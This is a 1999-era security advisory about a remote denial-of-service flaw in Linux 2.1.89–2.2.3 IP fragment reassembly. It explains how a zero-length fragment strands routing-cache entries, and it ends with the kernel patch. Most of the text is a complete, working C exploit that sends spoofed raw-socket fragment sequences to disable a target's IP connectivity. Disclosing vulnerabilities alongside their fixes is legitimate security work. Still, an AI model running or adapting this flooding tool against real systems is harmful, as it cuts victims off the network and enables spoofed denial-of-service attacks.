COMMAND
kernel
SYSTEMS AFFECTED
Linux kernels 2.1.89 through 2.2.3
PROBLEM
John McDonald found the following. The recent release of the Linux
2.2.4 kernel fixed a remote denial of service problem in the IP
fragment handling code. If you are running a Linux kernel
between 2.1.89 and 2.2.3, it would probably be a good idea to get
the latest version. The impact of this problem is that a remote
attacker can effectively disable a target's IP connectivity.
However, for the attack to succeed, the attacker will have to
deliver several thousand packets to the target, which can take up
to several minutes. A quick exploit and the patch are appended to
the end of this post. The problem starts in ip_glue() in
ip_fragment.c:
/* Copy the data portions of all fragments into the new buffer. */
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
if ((fp->len < 0) || ((count + fp->len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {
skb->dst = dst_clone(fp->skb->dst);
skb->dev = fp->skb->dev;
}
count += fp->len;
fp = fp->next;
}
The problem in this code is that if you can get a fragment into
the qp->fragments list that has a length of 0, and is the first
fragment in the list, then the call to dst_clone() will happen an
extra time. The first time through the loop, count will
necessarily equal qp->ihlen, causing dst_clone() to be called.
However, if fp->len happens to equal 0, then count += fp->len
won't increase it, and the next time through the loop, count will
still equal qp->ihlen. dst_clone() increments a usage count on
an element in the routing cache. Our 0 length fragment will cause
this element in the cache to become stranded. The kernel will not
free it when it does the garbage collection of the cache because
it will think it is currently in use. The other component of the
problem is that the call to allocate a new entry in the routing
cache does a check to see if the hashtable that comprises the
cache is at a saturated state. If it is, it proceeds to do a
garbage collection. If the number of entries in the cache, after
this garbage collection, is still higher than the threshold, then
dst_alloc() will fail. So, if we generate enough stranded entries
in the routing cache (4096 in 2.2.3) via our malicious frags, then
all further calls to dst_alloc will fail.
We can get a 0 length fragment into the head of the list by doing
the following; send a fragment at offset 0, with a length of X,
and IP_MF set. This creates our list.
Send a 0 length fragment at offset 0, where the ip header length
is equal to the ip total length, and IP_MF is set. This will be
treated as coming before the fragment already in our list, because
it has an offset equal to the offset of the existing fragment. It
doesn't overlap any other fragment, because its end is equal to the
following fragment's offset. Send a fragment at offset X, with IP_MF not
set. This will mark the end of our set of fragments. ip_done()
will return true because it will see the first frag going from 0
to 0, the second going from 0 to X, and the third going from X to
the end. Our fragments will get passed into ip_glue(). Here's
the exploit:
/*
* sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
*
* by horizon <jmcdonal@unf.edu>
*
* This sends a series of IP fragments such that a 0 length fragment is first
* in the fragment list. This causes a reference count on the cached routing
* information for that packet's originator to be incremented one extra time.
* This makes it impossible for the kernel to deallocate the destination entry
* and remove it from the cache.
*
* If we send enough fragments such that there are at least 4096 stranded
* dst cache entries, then the target machine will no longer be able to
* allocate new cache entries, and IP communication will be effectively
* disabled. You will need to set the delay such that packets are not being
* dropped, and you will probably need to let the program run for a few
* minutes to have the full effect. This was written for OpenBSD and Linux.
*
* Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
*/
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
/*
 * Option-less IPv4 header in wire layout (20 bytes).
 *
 * Fixed-width types are used so the structure has the same size on ILP32
 * and LP64 targets; with `unsigned long` addresses the struct grows to
 * 32 bytes on LP64 and IHLEN / ip_hl become wrong.
 *
 * The two 4-bit fields share the first octet: the version occupies the
 * high nibble on the wire, so their declaration order depends on how the
 * compiler allocates bit-fields for the host byte order.
 */
struct my_ip_header
{
#if defined(__BYTE_ORDER__) && defined(__ORDER_BIG_ENDIAN__) && \
    (__BYTE_ORDER__ == __ORDER_BIG_ENDIAN__)
    unsigned char ip_v:4,       /* version */
                  ip_hl:4;      /* header length, in 32-bit words */
#else
    unsigned char ip_hl:4,      /* header length, in 32-bit words */
                  ip_v:4;       /* version */
#endif
    uint8_t  ip_tos;            /* type of service */
    uint16_t ip_len;            /* total length */
    uint16_t ip_id;             /* identification */
    uint16_t ip_off;            /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
    uint8_t  ip_ttl;            /* time to live */
    uint8_t  ip_p;              /* protocol */
    uint16_t ip_sum;            /* checksum */
    uint32_t ip_src, ip_dst;    /* source and dest address */
};
/*
 * UDP header in wire layout (8 bytes).  Fixed-width fields guarantee the
 * size regardless of the platform's `unsigned short` width.
 */
struct my_udp_header
{
    uint16_t uh_sport;  /* source port */
    uint16_t uh_dport;  /* destination port */
    uint16_t uh_ulen;   /* UDP length */
    uint16_t uh_sum;    /* UDP checksum */
};
/* Size in bytes of the IP header structure built by this program. */
#define IHLEN (sizeof (struct my_ip_header))
/* Size in bytes of the UDP header structure. */
#define UHLEN (sizeof (struct my_udp_header))
/* EXTRA is added to the byte count handed to sendto() for the header-only
   (zero-length) fragment: 8 when built on OpenBSD, 0 otherwise.
   NOTE(review): presumably OpenBSD will not transmit a bare IP header
   through a raw socket -- confirm. */
#ifdef __OpenBSD__
#define EXTRA 8
#else
#define EXTRA 0
#endif
/*
 * Compute the 16-bit one's-complement Internet checksum of a buffer.
 *
 * data   - start of the buffer; it is read byte-wise, so it needs no
 *          particular alignment.
 * length - number of bytes to sum.  An odd trailing byte is treated as if
 *          it were followed by a zero pad byte.
 *
 * Returns the complemented sum in the same (native) representation the
 * 16-bit words were read in, so storing the result straight back into the
 * packet yields the correct bytes on either byte order.
 */
unsigned short checksum(unsigned short *data, unsigned short length)
{
    const unsigned char *bytes = (const unsigned char *)data;
    unsigned long sum = 0;      /* must start at zero; at least 32 bits wide */
    unsigned short word;
    size_t i;

    /* Sum all complete 16-bit words. memcpy avoids alignment and aliasing
       problems when the caller passes a cast char buffer. */
    for (i = 0; i + 1 < length; i += 2) {
        word = 0;
        memcpy(&word, bytes + i, 2);
        sum += word;
    }

    /* Odd length: the last byte is the first octet of a zero-padded word. */
    if (length & 1) {
        word = 0;
        memcpy(&word, bytes + length - 1, 1);
        sum += word;
    }

    /* Fold carries until none remain; one fold can itself produce a carry. */
    while (sum >> 16)
        sum = (sum & 0xFFFFUL) + (sum >> 16);

    return (unsigned short)(~sum & 0xFFFFUL);
}
/*
 * Turn a dotted-quad string or a host name into an IPv4 address.
 *
 * hostname - text to convert; tried first with inet_addr(), then with
 *            gethostbyname() if that fails.
 *
 * Returns the address in network byte order, widened to unsigned long.
 * Prints "Can't resolve target." to stderr and exits with status 1 when
 * no IPv4 address can be obtained.
 */
unsigned long resolve( char *hostname)
{
    /* in_addr_t is 32 bits wide, so the failure value compares correctly
       on LP64 as well (a `long` holding 0xFFFFFFFF is never == -1). */
    in_addr_t addr = inet_addr(hostname);

    if (addr == INADDR_NONE) {
        struct hostent *hp = gethostbyname(hostname);

        if (hp == NULL || hp->h_addrtype != AF_INET ||
            hp->h_length != (int)sizeof addr || hp->h_addr_list[0] == NULL) {
            fprintf(stderr,"Can't resolve target.\n");
            exit(1);
        }
        /* Copy exactly the 4 address bytes into the 4-byte destination. */
        memcpy(&addr, hp->h_addr_list[0], sizeof addr);
    }
    return (unsigned long)addr;
}
/* Write the command-line synopsis to stderr, then terminate with status 0. */
void usage(void)
{
    fputs("usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n",
          stderr);
    exit(0);
}
/*
 * Stamp total length, fragment-offset word and checksum into the IP header
 * at the start of `pkt`, then hand `wire_len` bytes to sendto().  The
 * checksum is taken over `ip_len` bytes.  On a sendto() failure the error
 * is reported with perror() and the process exits with status 1.
 */
static void push_fragment(int s, char *pkt, unsigned short ip_len,
                          unsigned short frag_off, size_t wire_len,
                          struct sockaddr_in *to)
{
    struct my_ip_header *hdr = (struct my_ip_header *)pkt;

    hdr->ip_len = htons(ip_len);
    hdr->ip_off = htons(frag_off);
    hdr->ip_sum = 0;
    hdr->ip_sum = checksum((unsigned short *)pkt, ip_len);

    if (sendto(s, pkt, wire_len, 0, (struct sockaddr *)to, sizeof(*to)) < 0) {
        perror("sendto");
        exit(1);
    }
}

/*
 * Build one UDP-in-IP datagram in a static buffer and send it on raw
 * socket `s` as three fragments, in this order:
 *   1. offset 0, 32 payload bytes, IP_MF set;
 *   2. offset 0, no payload (header only), IP_MF set;
 *   3. offset 4 (32 bytes), 32 payload bytes, IP_MF clear.
 *
 * source, dest - addresses copied unchanged into the IP header; `dest` is
 *                also the sendto() destination.
 * sport, dport - UDP ports in host order.
 */
void sendem(int s, unsigned long source, unsigned long dest,
            unsigned short sport, unsigned short dport)
{
    static char buffer[8192];
    struct my_ip_header *iph = (struct my_ip_header *)buffer;
    struct my_udp_header *udph = (struct my_udp_header *)(buffer + IHLEN);
    struct sockaddr_in to;

    bzero(&to, sizeof(struct sockaddr_in));
    to.sin_family = AF_INET;
    to.sin_port = htons(sport);
    to.sin_addr.s_addr = dest;

    /* Clear the header and the 32 payload bytes before filling them in. */
    bzero(buffer, IHLEN + 32);

    iph->ip_v = 4;
    iph->ip_hl = IHLEN >> 2;
    iph->ip_tos = 0;
    iph->ip_id = htons(random() & 0xFFFF);
    iph->ip_ttl = 142;
    iph->ip_p = IPPROTO_UDP;
    iph->ip_src = source;
    iph->ip_dst = dest;

    udph->uh_sport = htons(sport);
    udph->uh_dport = htons(dport);
    udph->uh_ulen = htons(64 - UHLEN);
    udph->uh_sum = 0;

    /* First fragment: offset 0, 32 bytes long. */
    push_fragment(s, buffer, IHLEN + 32, IP_MF, IHLEN + 32, &to);

    /* Second fragment: offset 0, zero length; EXTRA pads the byte count
       given to sendto() on OpenBSD. */
    push_fragment(s, buffer, IHLEN, IP_MF, IHLEN + EXTRA, &to);

    /* Third and final fragment: offset 4 (32 bytes), 32 bytes long. */
    push_fragment(s, buffer, IHLEN + 32, 32 / 8, IHLEN + 32, &to);
}
/*
 * Entry point.
 *
 * Options: -s sport, -d dport, -n count, -u delay (microseconds passed to
 * usleep()), followed by two positional arguments: source and target.
 * Opens a raw socket with IP_HDRINCL set and calls sendem() `count` times,
 * passing source + htonl(i) as the source address on iteration i and
 * sleeping `delay` microseconds on every even iteration.
 *
 * Returns 0 after all rounds have been sent; setup failures exit with
 * status 1.
 */
int main(int argc, char **argv)
{
    int sock;
    int on = 1, i;
    unsigned long source, dest;
    unsigned short sport = 53, dport = 16384;
    int delay = 20000, count = 15000;

    if (argc < 3)
        usage();

    while ((i = getopt(argc, argv, "s:d:n:u:")) != -1)
    {
        switch (i)
        {
        case 's':
            sport = atoi(optarg);
            break;
        case 'd':
            dport = atoi(optarg);
            break;
        case 'n':
            count = atoi(optarg);
            break;
        case 'u':
            delay = atoi(optarg);
            break;
        default:
            usage();
            break;
        }
    }
    argc -= optind;
    argv += optind;

    /* Options may have consumed the arguments counted by the first check;
       without both positionals argv[0]/argv[1] would be NULL below. */
    if (argc < 2)
        usage();

    source = resolve(argv[0]);
    dest = resolve(argv[1]);

    /* Unsigned arithmetic gives the same seed without signed overflow. */
    srandom((unsigned)time(NULL) * (unsigned)getpid());

    if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("socket");
        exit(1);
    }
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)
    {
        perror("setsockopt: IP_HDRINCL");
        exit(1);
    }

    fprintf(stdout,"\nStarting attack on %s ...",argv[1]);
    for (i = 0; i < count; i++)
    {
        sendem(sock, source + htonl(i), dest, sport, dport);
        if (!(i % 2))
            usleep(delay);
        /* Progress: one dot per 100 rounds, a new line every 2000. */
        if (!(i % 100))
        {
            if (!(i % 2000))
                fprintf(stdout,"\n");
            fprintf(stdout,".");
            fflush(stdout);
        }
    }
    fprintf(stdout,"\nDone.\n");

    /* Normal completion is success, not status 1. */
    return 0;
}
SOLUTION
Upgrade to kernel 2.2.4. Here is the patch:
--- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999
+++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999
@@ -17,6 +17,7 @@
* xxxx : Overlapfrag bug.
* Ultima : ip_expire() kernel panic.
* Bill Hawes : Frag accounting and evictor fixes.
+ * John McDonald : 0 length frag bug.
*/
#include <linux/types.h>
@@ -357,7 +358,7 @@
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
- if ((fp->len < 0) || ((count + fp->len) > skb->len))
+ if ((fp->len <= 0) || ((count + fp->len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {